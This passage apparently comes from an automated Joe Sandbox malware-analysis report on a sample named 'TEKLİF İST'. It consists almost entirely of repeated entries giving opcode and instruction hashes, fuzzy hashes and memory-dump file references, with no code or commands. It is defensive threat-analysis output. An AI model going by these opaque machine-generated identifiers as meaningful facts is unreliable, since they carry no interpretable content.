                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction Fuzzy Hash: 34419675F00215EBDF16DF99CC84AAFBBBAAF84600F158069E50597385DB74DE00CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd71f7ef81d6b00849303d5a3fe74271e80b35e78ed1fc88681e378d95cc8850
                                                                                                              • Instruction ID: 610bd5731a4594512a7f44d49dc753ba059ca9c8ac208580ad83daa7310019fb
                                                                                                              • Opcode Fuzzy Hash: dd71f7ef81d6b00849303d5a3fe74271e80b35e78ed1fc88681e378d95cc8850
                                                                                                              • Instruction Fuzzy Hash: 7341D1716007029FE729EF2CC580A62BBF5FF49314B108AADE64787A50E730E845DB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6259b64f605d399f355dc43e733995d6b396347958a1c39182f8bcf4c5fa22f
                                                                                                              • Instruction ID: 8f44a2f87387679843dfa72ba91640c7197b2f9538cce4b2f4ba638c717e1336
                                                                                                              • Opcode Fuzzy Hash: e6259b64f605d399f355dc43e733995d6b396347958a1c39182f8bcf4c5fa22f
                                                                                                              • Instruction Fuzzy Hash: 4B418932944215CFDF29DF68C8947AD7BB8FB28350F4802E5D412BB295DB38E900CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0fb7a168a77b95c8700008841721d17724e53e72fb97ee6097ae9969324c38f
                                                                                                              • Instruction ID: 5418a6b747277acedc9e4231d0e062c620365f0489ce16cd9bbf908a63730657
                                                                                                              • Opcode Fuzzy Hash: c0fb7a168a77b95c8700008841721d17724e53e72fb97ee6097ae9969324c38f
                                                                                                              • Instruction Fuzzy Hash: 4841E531A05202CFDB2DDF98C880B5EBBB6FBA9704F18C1ADD9015B256C775D842DB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f3bf5fa356a3ebd7c319fb82bca25b2ed0f32ca7db96c46674ef784e5718f35
                                                                                                              • Instruction ID: e9bce5fdc882a74cc135deca145f6fb071059db4c2cc579672e70970de5eea13
                                                                                                              • Opcode Fuzzy Hash: 2f3bf5fa356a3ebd7c319fb82bca25b2ed0f32ca7db96c46674ef784e5718f35
                                                                                                              • Instruction Fuzzy Hash: D5418C315083069FDB16DF68D940A6BB7E8EF84B94F400A6EF980D7250E734DE158B93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 7a1c823f3b237236263dad866ddb75b2de18f6a6000d23adcc3f0e5560d39150
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 41414931A00211DBEF2DEE799584BBAFB61EBD4750F2580FAE984CB241D7329D51CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1dfd42e1c84e4d4b447901d5e2eeab9be88818eb1ad2b522a1254000f9e166f
                                                                                                              • Instruction ID: 677f331dff84623258b1ee08563e530c94bb46932274b6a9bb24c1b3de1d3a15
                                                                                                              • Opcode Fuzzy Hash: b1dfd42e1c84e4d4b447901d5e2eeab9be88818eb1ad2b522a1254000f9e166f
                                                                                                              • Instruction Fuzzy Hash: DB416A71600701EFD729DF18D840B66BBF4FF58314F24CAAAEA498B251E771E942DB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: c7a7e534d6960c8887983bea7f84ccd64f7071bee1dbafc4b11fef5850811356
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: FE410A71A00705EFDB69DF98C980AAABBF4FF19700B1049AEE566D7691D330EA44CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c3ae460186e72e6d1aca0d40a78afe086bcce7d4ac0788f57908ff234c9a6d2
                                                                                                              • Instruction ID: 369c1cbe1949cbc36730ca5e0b0118cbfec405f306bedbad9f88fea5f4bcba7c
                                                                                                              • Opcode Fuzzy Hash: 3c3ae460186e72e6d1aca0d40a78afe086bcce7d4ac0788f57908ff234c9a6d2
                                                                                                              • Instruction Fuzzy Hash: CB41B0B0901711DFCB2AEF29E900765B7B1FF99310F10C2E9E5169B2A1DB30E941EB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7061120314db7a448c6871eac04e1e56d3a3d0c49be1667b0a399856d8233e1
                                                                                                              • Instruction ID: 7a352857b53050e30ea6c01314e3519199277e797e201bd14b9befcb305628ca
                                                                                                              • Opcode Fuzzy Hash: a7061120314db7a448c6871eac04e1e56d3a3d0c49be1667b0a399856d8233e1
                                                                                                              • Instruction Fuzzy Hash: C63179B1A40646DFDB5ACF98C040799BBF4EB09714F2085AED119EB251D776D902CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a595312852b5d44fa26839ebeb2815b9b8ab7e7ea56d09088a33d4a3f7bd55c5
                                                                                                              • Instruction ID: f1bfd05c7cbde1f7ac01726180c3462b6004dafa79165c8f4acf627aad32f542
                                                                                                              • Opcode Fuzzy Hash: a595312852b5d44fa26839ebeb2815b9b8ab7e7ea56d09088a33d4a3f7bd55c5
                                                                                                              • Instruction Fuzzy Hash: C2418C71508311ABD724EF29C845B9BBBE8FF98A14F008A6EF598D7290D770D904CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e0909c695234ecf99782dd7314f7f0a146215090d0bb7e433a0f42404f4989f
• Instruction ID: e6934e59deb9233efb7a32c9b115f9a64fbaa6687381b620c52e31de56fa9586
• Opcode Fuzzy Hash: 5e0909c695234ecf99782dd7314f7f0a146215090d0bb7e433a0f42404f4989f
• Instruction Fuzzy Hash: E941D476604642DBC728EF68C840B6AB7E5FFC8B00F14066DF95587690E730D904C7A5
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f05b7e5068711d17fdabc23f532845e5aae99ad65ec638bb0e9a27795de4b95
• Instruction ID: 5a4f985709fb21aaff94791ceac9ddc69611870e2a93d3a9cff9594e0302e69e
• Opcode Fuzzy Hash: 6f05b7e5068711d17fdabc23f532845e5aae99ad65ec638bb0e9a27795de4b95
• Instruction Fuzzy Hash: B841D5752043028FEB29DF1CD884B26BBE5FF81354F1484ADEA468B291D730D921EB51
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction ID: e72c0659dd8d22b35faa83612340ae3a88c4ff8423b9861c4df0ed35006a9dbd
• Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction Fuzzy Hash: 9D31F531A04244ABDB5AAB68CC84B9ABFE9EF18350F0482E5F855D7352D7B4D944CBA0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32758d4caf24bb566dc91a438a7e2717a36962c6c6a1d378d2b8036bb7d8050e
• Instruction ID: 9d51579cfce6d7fc94df30ae2ef7e10da7b19f596236fcb5bf97575292922eb0
• Opcode Fuzzy Hash: 32758d4caf24bb566dc91a438a7e2717a36962c6c6a1d378d2b8036bb7d8050e
• Instruction Fuzzy Hash: 2431A831750756ABDB2AAF559C45F6F76F8AF58B50F0000A8FA00AB391DBA8DD00C7A0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e870a87f273e391e4a7747afa2f26cb6a278291b82dad55ea0457383b99e16dd
• Instruction ID: 56e7269c912da64825f8f23fcce9ab16b203a9fa00ed62be20cdef5870c4680d
• Opcode Fuzzy Hash: e870a87f273e391e4a7747afa2f26cb6a278291b82dad55ea0457383b99e16dd
• Instruction Fuzzy Hash: F431CF322052119FC729DF19D880F66B7F5FB84364F0A44AEEA968B352D731E908CB91
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f422542ffe05b1961e82d850306ede44fbd0d2e8aa92aa49347dab80dbe3213
• Instruction ID: f46a72e89484157975dafa9319789bfc954e4b35b0e63787174a3735e2951139
• Opcode Fuzzy Hash: 1f422542ffe05b1961e82d850306ede44fbd0d2e8aa92aa49347dab80dbe3213
• Instruction Fuzzy Hash: 3541DF31204B45DFDB2ADF28C480FDA7BE8EF49750F0184ADE69A8B250C770E804DB60
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f48a465eb52fa20eff330269a1df9f009e811d96b826f79834268e6962a3c79
• Instruction ID: 905d7485dcf6446f7a4b3f39d6f222785828768c685d28498bb106082fd60053
• Opcode Fuzzy Hash: 4f48a465eb52fa20eff330269a1df9f009e811d96b826f79834268e6962a3c79
• Instruction Fuzzy Hash: 11315C716042019FD728DF29D880B6BB7E5FB84724F0545ADEA599B391E730E908CBA2
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 083df8a88d4f3eb1b667763dde9a6a17dae3c61fe98e4a9a284191e8ca89a75f
• Instruction ID: a9aece12c78a3bde4413db72b5dd81a7f185b1ffd5b7a10eb397b550b3f6d4f8
• Opcode Fuzzy Hash: 083df8a88d4f3eb1b667763dde9a6a17dae3c61fe98e4a9a284191e8ca89a75f
• Instruction Fuzzy Hash: B331A6312016829BF73A575CCDC8BF57BD4FB41B84F1900E4AA46DBAF1DBA8D840C224
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cc68ad447dea40dc6d4f806bf0c2512828af2e5c7b146f9c8f74a1a130c828d
• Instruction ID: fe8bec62d50dffe96f95a4d21f58c2d1e1169b9ddced10cb648397610970c9dd
• Opcode Fuzzy Hash: 8cc68ad447dea40dc6d4f806bf0c2512828af2e5c7b146f9c8f74a1a130c828d
• Instruction Fuzzy Hash: D031E475A00226EBDB16DF98CC40BAEB7B9FB44B40F454168E900AB284D770ED50CBA0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f19d033a0fe07c5932285a19463b5a57c7f39d2adb41d3caf428223cfc27d6ba
• Instruction ID: 740b920cc0e8b8dd7f986478addef9c911d4ba302cb46b50de8b1616ecfa6427
• Opcode Fuzzy Hash: f19d033a0fe07c5932285a19463b5a57c7f39d2adb41d3caf428223cfc27d6ba
• Instruction Fuzzy Hash: BC314F76A4012DABCF259F54DC88BDEBBF9EB98750F1001E5A908E7250DB30DE918F90
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 60e912a1db6314210c8fedf44bc8287eb4b420bedf4f9d39116560aca4cc8101
• Instruction ID: f65f01ce94fbb453f99bcbff4800ac688ccfe384abc98805b7cbd78ace800ae7
• Opcode Fuzzy Hash: 60e912a1db6314210c8fedf44bc8287eb4b420bedf4f9d39116560aca4cc8101
• Instruction Fuzzy Hash: D631C476E00215AFDB25DFA9C880AAEBBF8EF14750F0545A5E916E7250D774DA008BA0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f2d686fdd5b6adf315308ad6a49d7447cc33c4a4e6318239de0af4631478628
• Instruction ID: c92d28f9738f12ec56aea69fe232a0ad8a4f4e423b94aec83669fdbafa06da2e
• Opcode Fuzzy Hash: 6f2d686fdd5b6adf315308ad6a49d7447cc33c4a4e6318239de0af4631478628
• Instruction Fuzzy Hash: 3231E571B40626EFDB279FA9CC50B6EBBB9AF44754F0040A9E906DB391DB30DD108B90
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3845e9951ed6c7067951e7bfbd996f5bbc2f344daa1789ddff2ffb4d40e802ba
• Instruction ID: 9e1710846dd659c214c4e14e85929e233fc99da7331ddc88512c3a4f852cd5ea
• Opcode Fuzzy Hash: 3845e9951ed6c7067951e7bfbd996f5bbc2f344daa1789ddff2ffb4d40e802ba
• Instruction Fuzzy Hash: 0B310A32A04752DBDB1AEE28C940EAB7BA5EFD4250F0185A9FE5597310EB30DC11A7E1
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0df9c4f48e1b98c92451ec6787018d0bb73b9eae0d4aa128500fd1e00687c1f7
• Instruction ID: 14bc6598bcd5fca64e85a46992f5fa5c67bf540bd8bbad9101090dffca1f710b
• Opcode Fuzzy Hash: 0df9c4f48e1b98c92451ec6787018d0bb73b9eae0d4aa128500fd1e00687c1f7
• Instruction Fuzzy Hash: 4831AD716493018FE728CF19C840B2BBBE5FB98700F458AEEE98497351D770E844CB91
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction ID: 35d7d4edd059c5f53a481a85a58c4adbb84a9c5e9fd276ab7e6ecaa093554538
• Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction Fuzzy Hash: 74311C72B00701AFD769CF79CD80B5ABBF8EB08B50F0805ADA56AC3650E770E900CB60
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04db8f5618ef8c39cecb237366ffbb3bac57539e1b00f670de47bb5589455456
• Instruction ID: 3d8804b51ffbda1418517f54cb14d2d54d383cf4e5d42e48d16571639c2a63da
• Opcode Fuzzy Hash: 04db8f5618ef8c39cecb237366ffbb3bac57539e1b00f670de47bb5589455456
• Instruction Fuzzy Hash: 8E31ABB1505342DFCB19DF19C548A5ABBF1FF8A218F044AEEE8889B351D331DA54CB92
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f0804fd7ed534f957959e53ea87a8f9b7b2d70666a75581e7e397a56e7eb1bc
• Instruction ID: 65ef395f88d59aac73844bf6b03dbe267eafe6e50dcd8519479e804cc2300ac5
• Opcode Fuzzy Hash: 1f0804fd7ed534f957959e53ea87a8f9b7b2d70666a75581e7e397a56e7eb1bc
• Instruction Fuzzy Hash: 6F31F431B006059FDB2CEFA9C981B6EBBFDEBA4304F0085A9D506D3650DB34E941CB90
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
• Instruction ID: c336ea0dc82055d7515bc06fa3bcfa38447301ec66e69ea8a910f1229f0a0a1c
• Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
• Instruction Fuzzy Hash: BF210436E4425AAADF199BB98840BAFBBB5EF54740F0681B69E15F7340E370D90187E0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7567b023d357a141d9b954eabbcdef23bd31fadc4636dbf44f9c0df79b8759e1
• Instruction ID: 71ad192a2c0a529abc2d68a1b7e63af8356ac348a78138272242d375c46df2e9
                                                                                                              • Opcode Fuzzy Hash: 7567b023d357a141d9b954eabbcdef23bd31fadc4636dbf44f9c0df79b8759e1
                                                                                                              • Instruction Fuzzy Hash: E83149B15002119BDF39AF69C840B6977B4EF51304F9481F9ED469B342DB38D983CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: 4a190a39c137c9b67f6ec7064a277582de432e403e5004919f6245e1acd8ade3
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 23212B3660065AA7CF1DAB958800EBABFB4EF40710F40809EFBA587691E734D994C760
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d30c28f495a80df0e492b441e1840aca28114a913310759a7c0be59c8dc2b675
                                                                                                              • Instruction ID: cc5fc89e9231c568ecc7bca950c9309474de3afb9f44a472d3799f9fe540c249
                                                                                                              • Opcode Fuzzy Hash: d30c28f495a80df0e492b441e1840aca28114a913310759a7c0be59c8dc2b675
                                                                                                              • Instruction Fuzzy Hash: C731A232A01529ABDB399B18CC41FEE77B9EB55740F0101E2E645A7290D774EE90CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: ad40460884b1b73aef43de33fe909df548538c28d4edbbb914a2bd444e93fa5e
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: 8C216075A00609EBCF19CF98D980A9EBBB5FF48715F1080E5FE259B241D771EA05CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b7e4dc99cba891266335ed85ca526d19c091b8b344a42643ad49f60929f6e4c
                                                                                                              • Instruction ID: 2a830bb67e00f6d7dec5097a2031194c299053841d84bcee099cf91b25eff6b7
                                                                                                              • Opcode Fuzzy Hash: 5b7e4dc99cba891266335ed85ca526d19c091b8b344a42643ad49f60929f6e4c
                                                                                                              • Instruction Fuzzy Hash: 5E21B1726047459BCB26DF18C880B6BB7E5FF88761F004699FD659B641D730E9008BA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: fc36ae449a4c65ee2b6f2da0a504b5621e3566d41496456553e093aed4a8989d
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 74317A31600605EFDB29DFA9C884F6AB7F9EF85354F1445A9E5528B290E730EE02CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edb7fabfac94fed7b0d01ae2a53c62e111d08522b2721ad4fd96bf6001f4c2e0
                                                                                                              • Instruction ID: 9e0ab71a5e3baf68686b6d58c1a6916ef59289da0b32690b2414658ec67ec6e2
                                                                                                              • Opcode Fuzzy Hash: edb7fabfac94fed7b0d01ae2a53c62e111d08522b2721ad4fd96bf6001f4c2e0
                                                                                                              • Instruction Fuzzy Hash: 9E318F75A00216EFCB18CF18C4849EE77B5FF94704B154599F9069B7A1E7B1EA40CB90
                                                                                                              Memory Dump Source
